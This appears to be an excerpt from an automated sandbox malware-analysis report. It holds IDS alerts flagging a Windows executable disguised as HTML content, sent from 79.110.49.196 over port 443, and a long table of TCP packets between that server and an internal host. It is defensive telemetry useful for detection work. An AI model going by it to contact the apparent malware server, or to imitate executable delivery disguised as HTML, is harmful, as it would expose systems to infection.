2024-09-30T14:20:14.462599+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49733	TCP
2024-09-30T14:20:16.798438+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49737	TCP
2024-09-30T14:20:18.031600+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49738	TCP
2024-09-30T14:20:20.265333+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49739	TCP
2024-09-30T14:20:21.738857+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.196	443	192.168.2.6	49740	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 14:20:01.467201948 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:01.467250109 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:01.467406034 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:01.487746000 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:01.487765074 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.122770071 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.122859955 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.142173052 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.142218113 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.142448902 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.190721989 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.368906021 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.411422014 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.611927032 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.611947060 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.611954927 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.611985922 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.612020016 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.612054110 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.612070084 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.612103939 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.612128973 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.699604034 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.699624062 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.699696064 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.699707985 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.699784994 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.701035976 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.701052904 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.701107979 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.701117039 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.701137066 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.701154947 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.787679911 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.787702084 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.787770987 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.787787914 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.787817001 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.787831068 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.788831949 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.788851976 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.788892031 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.788898945 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.788930893 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.788958073 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.789932013 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.789947987 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.790008068 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.790015936 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.790065050 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.862386942 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.862409115 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.862490892 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.862500906 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.862597942 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.862729073 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.862791061 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.862797022 CEST	443	49715	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:02.862970114 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:02.867711067 CEST	49715	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:03.298819065 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:03.298858881 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:03.298928976 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:03.299263000 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:03.299282074 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:03.937836885 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:03.940829992 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:03.940854073 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.202747107 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.202774048 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.202790022 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.202856064 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:04.202877998 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.202933073 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:04.203130007 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.203185081 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:04.203197002 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.203210115 CEST	443	49719	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:04.203315973 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:04.203991890 CEST	49719	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.067238092 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.067306042 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.067401886 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.067682981 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.067703962 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.716290951 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.771608114 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.775156975 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.775175095 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987723112 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987751961 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987761974 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987790108 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987807035 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987816095 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987818003 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.987843990 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:07.987863064 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:07.987911940 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.079063892 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.079087019 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.079150915 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.079169989 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.079207897 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.079225063 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.080735922 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.080758095 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.080805063 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.080820084 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.080847025 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.080868006 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.170820951 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.170846939 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.170917988 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.170931101 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.170978069 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.171755075 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.171776056 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.171835899 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.171847105 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.171880007 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.171900034 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.232609034 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.232649088 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.232703924 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.232711077 CEST	443	49726	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.232774973 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.233257055 CEST	49726	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.243941069 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.243978977 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.244081974 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.244302034 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.244311094 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.881433010 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:08.883390903 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:08.883411884 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.144912958 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.144936085 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.144953966 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.145060062 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.145077944 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.145138979 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.234843969 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.234904051 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.235141993 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.235151052 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.235209942 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.236037970 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.236079931 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.236196995 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.236202002 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.236254930 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.324322939 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.324372053 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.324445963 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.324453115 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.324512005 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.324532986 CEST	443	49727	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.324594975 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.324984074 CEST	49727	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.334407091 CEST	49728	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.334445953 CEST	443	49728	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.334553957 CEST	49728	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.334744930 CEST	49728	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.334758043 CEST	443	49728	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.959665060 CEST	443	49728	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:09.961093903 CEST	49728	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:09.961117983 CEST	443	49728	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:10.217247009 CEST	443	49728	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:10.217463017 CEST	443	49728	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:10.217638016 CEST	49728	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:10.220885992 CEST	49728	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:10.450576067 CEST	49730	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:10.450628042 CEST	443	49730	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:10.450690985 CEST	49730	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:10.458810091 CEST	49730	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:10.458833933 CEST	443	49730	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.094238043 CEST	443	49730	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.095638037 CEST	49730	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.095659971 CEST	443	49730	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.353365898 CEST	443	49730	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.353763103 CEST	443	49730	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.353830099 CEST	49730	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.354547977 CEST	49730	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.358763933 CEST	49731	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.358827114 CEST	443	49731	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.358912945 CEST	49731	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.359129906 CEST	49731	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.359162092 CEST	443	49731	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.986185074 CEST	443	49731	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:11.988696098 CEST	49731	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:11.988744020 CEST	443	49731	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:12.244400978 CEST	443	49731	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:12.244606018 CEST	443	49731	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:12.244751930 CEST	49731	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:12.246001005 CEST	49731	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:12.251322031 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:12.251360893 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:12.251470089 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:12.251754045 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:12.251765013 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:12.892457008 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:12.893794060 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:12.893821955 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.156929970 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.156981945 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.157025099 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.157058001 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.157078981 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.157094955 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.157134056 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.246283054 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.246332884 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.246388912 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.246401072 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.246479034 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.247946024 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.248008013 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.248033047 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.248038054 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.248076916 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.248100042 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.349133968 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.349190950 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.349231005 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.349242926 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.349278927 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.349307060 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.350166082 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.350213051 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.350255966 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.350260019 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.350322008 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.350327015 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.350395918 CEST	443	49732	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.350440025 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.352437973 CEST	49732	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.376312971 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.376342058 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:13.376430035 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.376774073 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:13.376795053 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.017477036 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.019140005 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.019169092 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.282845974 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.282881021 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.282926083 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.283006907 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.283042908 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.283068895 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.283101082 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.372489929 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.372541904 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.372641087 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.372657061 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.372735977 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.374170065 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.374229908 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.374274969 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.374281883 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.374341965 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.374392986 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.462682009 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.462707043 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.462807894 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.462829113 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.462892056 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.462925911 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.463767052 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.463809013 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.463856936 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.463864088 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.463907957 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.463934898 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.464812040 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.464854002 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.464899063 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.464905024 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.464950085 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.464972973 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.465904951 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.465949059 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.465991020 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.465997934 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.466048002 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.466073036 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.553245068 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.553293943 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.553332090 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.553342104 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.553399086 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.553426027 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.554054976 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.554097891 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.554145098 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.554152012 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.554188013 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.554209948 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.554835081 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.554877043 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.554919958 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.554929018 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.554970980 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.554995060 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.555566072 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.555609941 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.555676937 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.555685043 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.555749893 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.556473970 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.556514025 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.556581020 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.556588888 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.556621075 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.556649923 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.556655884 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.556829929 CEST	443	49733	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.556900024 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.557135105 CEST	49733	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.630199909 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.630253077 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:14.630425930 CEST	49737	443	192.168.2.6	79.110.49.196
